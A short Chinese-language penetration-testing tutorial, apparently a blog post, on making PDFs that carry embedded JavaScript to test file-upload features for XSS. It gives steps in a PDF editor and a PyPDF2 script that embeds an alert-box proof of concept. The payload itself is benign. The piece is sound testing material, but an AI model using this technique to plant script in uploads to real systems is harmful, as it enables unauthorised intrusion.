【渗透测试】借助PDF进行XSS漏洞攻击

简介

在平时工作渗透测试一个系统时,常常会遇到文件上传功能点,其中大部分会有白名单或者黑名单机制,很难一句话木马上传成功,而PDF则是被忽略的一个点,可以让测试报告更丰富一些。

含有XSS的PDF制作步骤

1. 编辑器生成含有XSS的PDF

下载PDF编辑器
迅捷PDF编辑器 - 多功能的PDF编辑软件

新建一个文档
点击编辑器左下角的文件属性选择Javascript->添加->输入恶意XSS代码

app.alert('xss');

利用 JavaScript 进行攻击时只能使用 Adobe 所支持的功能

保存后,使用浏览器打开
弹框成功

2.Python生成含有XSS的PDF

若不想PDF带水印,还可以使用Python编写poc制作含有XSS的PDF

安装第三方库:

pip install PyPDF2 -i https://pypi.tuna.tsinghua.edu.cn/simple

python 复制代码
from PyPDF2 import PdfReader,PdfWriter

new_PDF = PdfWriter()
# 写入JavaScript代码
new_PDF.add_js("app.alert('xss');")
f = open("没有危害的PDF.pdf","wb")
new_PDF.write(f)
f.close() 
相关推荐
M1A17 分钟前
全栈开发必备:Windows安装VS Code全流程
前端·后端·全栈
蜗牛快跑1237 分钟前
github 源码阅读神器 deepwiki,自动生成源码架构图和知识库
前端·后端
嘻嘻嘻嘻嘻嘻ys9 分钟前
《Vue 3.4响应式超级工厂:Script Setup工程化实战与性能跃迁》
前端·后端
장숙혜12 分钟前
ElementUi的tabs样式太难修改,自定义tabs标签页
前端·javascript
用户214118326360213 分钟前
dify案例分享-魔搭+Dify王炸组合!10分钟搭建你的专属 生活小助理
前端
工呈士13 分钟前
HTML与安全性:XSS、防御与最佳实践
前端·html·xss
WEI_Gaot16 分钟前
zustand 基础和进阶
前端·react.js
程序员Qian19 分钟前
从开发天气MCP服务入门什么是MCP
前端
用户20311966009620 分钟前
sheet的基本用法
前端
火星思想26 分钟前
都2025年了,还在问构建工具是干嘛的?
前端·前端框架·设计